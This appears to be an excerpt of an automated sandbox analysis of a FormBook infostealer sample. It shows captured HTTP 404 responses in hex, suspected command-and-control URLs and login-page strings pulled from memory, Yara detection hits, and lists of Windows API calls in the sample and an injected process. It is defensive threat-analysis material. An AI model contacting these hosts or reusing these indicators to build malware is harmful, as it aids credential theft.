                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.1.29cache-control: no-cache, privatecontent-type: text/html; charset=UTF-8content-length: 6603date: Sat, 11 Jan 2025 04:11:18 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 38 2e 30 2e 31 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 63 6f 6c 61 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 2a 2f 68 74 6d 6c 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 6d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 79 73 74 65 6d 2d 75 69 2c 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 41 72 69 61 6c 2c 4e 6f 74 6f 20 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 2c 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 2a 2c 3a 61 66 74 65 72 2c 3a 62 65 66 6f 72 65 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 72 64 65 72 3a 30 20 73 6f 6c 69 64 20 23 65 32 65 38 66 30 7d 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 69 6e 68 65 72 69 74 7d 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 4d 6f 6e 61 63 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 4c 69 62 65 72 61 74 69 6f 6e 20 4d 6f 6e 6f 2c 43 6f 75 72 69 65 72 20 4e 65 77 2c 6d 6f 6e 6f 73 70 61 63 65 7d 73 76 67 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 76 69 64 65 6f 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 61 75 74 6f 7d 2e 62 67 2d 77 68 69 74 65 7b 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:12:04 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:12:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:12:10 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:12:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: ZcshRk2lgh.exeString found in binary or memory: http://tempuri.org/kviskotekaDbDataSet.xsdcIgra
                Source: EbjRcLZjak.exe, 0000000E.00000002.3098541538.00000000053E2000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.whisperart.net
                Source: EbjRcLZjak.exe, 0000000E.00000002.3098541538.00000000053E2000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.whisperart.net/rfcw/
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: regini.exe, 0000000D.00000002.3097407112.000000000462E000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 0000000D.00000002.3099305756.0000000006200000.00000004.00000800.00020000.00000000.sdmp, EbjRcLZjak.exe, 0000000E.00000002.3096520565.0000000003B1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: regini.exe, 0000000D.00000002.3092940507.0000000002EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: regini.exe, 0000000D.00000002.3092940507.0000000002EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: regini.exe, 0000000D.00000002.3092940507.0000000002EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: regini.exe, 0000000D.00000002.3092940507.0000000002EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: regini.exe, 0000000D.00000002.3092940507.0000000002EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033u
                Source: regini.exe, 0000000D.00000002.3092940507.0000000002EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: regini.exe, 0000000D.00000002.3092940507.0000000002EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: regini.exe, 0000000D.00000003.1824115593.0000000007C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: regini.exe, 0000000D.00000002.3097407112.0000000004952000.00000004.10000000.00040000.00000000.sdmp, EbjRcLZjak.exe, 0000000E.00000002.3096520565.0000000003E42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.cssa.auction/rjvg/?-Jkp4f=tUIUitDW424aYZRkIy55Xux7Uvf
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 11.2.ZcshRk2lgh.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.ZcshRk2lgh.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3098541538.0000000005390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3092740310.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1633443827.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3092558737.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3095243481.0000000004DA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1634959361.00000000036C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0042C8D3 NtClose,11_2_0042C8D3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2B60 NtClose,LdrInitializeThunk,11_2_014E2B60
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_014E2DF0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_014E2C70
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E35C0 NtCreateMutant,LdrInitializeThunk,11_2_014E35C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E4340 NtSetContextThread,11_2_014E4340
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E4650 NtSuspendThread,11_2_014E4650
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2BE0 NtQueryValueKey,11_2_014E2BE0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2BF0 NtAllocateVirtualMemory,11_2_014E2BF0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2B80 NtQueryInformationFile,11_2_014E2B80
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2BA0 NtEnumerateValueKey,11_2_014E2BA0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2AD0 NtReadFile,11_2_014E2AD0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2AF0 NtWriteFile,11_2_014E2AF0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2AB0 NtWaitForSingleObject,11_2_014E2AB0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2D00 NtSetInformationFile,11_2_014E2D00
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2D10 NtMapViewOfSection,11_2_014E2D10
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2D30 NtUnmapViewOfSection,11_2_014E2D30
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2DD0 NtDelayExecution,11_2_014E2DD0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2DB0 NtEnumerateKey,11_2_014E2DB0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2C60 NtCreateKey,11_2_014E2C60
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2C00 NtQueryInformationProcess,11_2_014E2C00
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2CC0 NtQueryVirtualMemory,11_2_014E2CC0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2CF0 NtOpenProcess,11_2_014E2CF0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2CA0 NtQueryInformationToken,11_2_014E2CA0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2F60 NtCreateProcessEx,11_2_014E2F60
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2F30 NtCreateSection,11_2_014E2F30
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2FE0 NtCreateFile,11_2_014E2FE0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2F90 NtProtectVirtualMemory,11_2_014E2F90
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2FA0 NtQuerySection,11_2_014E2FA0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2FB0 NtResumeThread,11_2_014E2FB0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2E30 NtWriteVirtualMemory,11_2_014E2E30
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2EE0 NtQueueApcThread,11_2_014E2EE0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2E80 NtReadVirtualMemory,11_2_014E2E80
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2EA0 NtAdjustPrivilegesToken,11_2_014E2EA0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E3010 NtOpenDirectoryObject,11_2_014E3010
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E3090 NtSetValueKey,11_2_014E3090
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E39B0 NtGetContextThread,11_2_014E39B0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E3D70 NtOpenThread,11_2_014E3D70
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E3D10 NtOpenProcessToken,11_2_014E3D10
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B4340 NtSetContextThread,LdrInitializeThunk,13_2_034B4340
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B4650 NtSuspendThread,LdrInitializeThunk,13_2_034B4650
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2B60 NtClose,LdrInitializeThunk,13_2_034B2B60
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2BE0 NtQueryValueKey,LdrInitializeThunk,13_2_034B2BE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_034B2BF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2BA0 NtEnumerateValueKey,LdrInitializeThunk,13_2_034B2BA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2AD0 NtReadFile,LdrInitializeThunk,13_2_034B2AD0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2AF0 NtWriteFile,LdrInitializeThunk,13_2_034B2AF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2F30 NtCreateSection,LdrInitializeThunk,13_2_034B2F30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2FE0 NtCreateFile,LdrInitializeThunk,13_2_034B2FE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2FB0 NtResumeThread,LdrInitializeThunk,13_2_034B2FB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2EE0 NtQueueApcThread,LdrInitializeThunk,13_2_034B2EE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2E80 NtReadVirtualMemory,LdrInitializeThunk,13_2_034B2E80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2D10 NtMapViewOfSection,LdrInitializeThunk,13_2_034B2D10
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2D30 NtUnmapViewOfSection,LdrInitializeThunk,13_2_034B2D30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2DD0 NtDelayExecution,LdrInitializeThunk,13_2_034B2DD0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2DF0 NtQuerySystemInformation,LdrInitializeThunk,13_2_034B2DF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2C60 NtCreateKey,LdrInitializeThunk,13_2_034B2C60
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2C70 NtFreeVirtualMemory,LdrInitializeThunk,13_2_034B2C70
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2CA0 NtQueryInformationToken,LdrInitializeThunk,13_2_034B2CA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B35C0 NtCreateMutant,LdrInitializeThunk,13_2_034B35C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B39B0 NtGetContextThread,LdrInitializeThunk,13_2_034B39B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2B80 NtQueryInformationFile,13_2_034B2B80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2AB0 NtWaitForSingleObject,13_2_034B2AB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2F60 NtCreateProcessEx,13_2_034B2F60
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2F90 NtProtectVirtualMemory,13_2_034B2F90
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2FA0 NtQuerySection,13_2_034B2FA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2E30 NtWriteVirtualMemory,13_2_034B2E30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2EA0 NtAdjustPrivilegesToken,13_2_034B2EA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2D00 NtSetInformationFile,13_2_034B2D00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2DB0 NtEnumerateKey,13_2_034B2DB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2C00 NtQueryInformationProcess,13_2_034B2C00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2CC0 NtQueryVirtualMemory,13_2_034B2CC0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B2CF0 NtOpenProcess,13_2_034B2CF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B3010 NtOpenDirectoryObject,13_2_034B3010
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B3090 NtSetValueKey,13_2_034B3090
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B3D70 NtOpenThread,13_2_034B3D70
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B3D10 NtOpenProcessToken,13_2_034B3D10
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_009393F0 NtCreateFile,13_2_009393F0
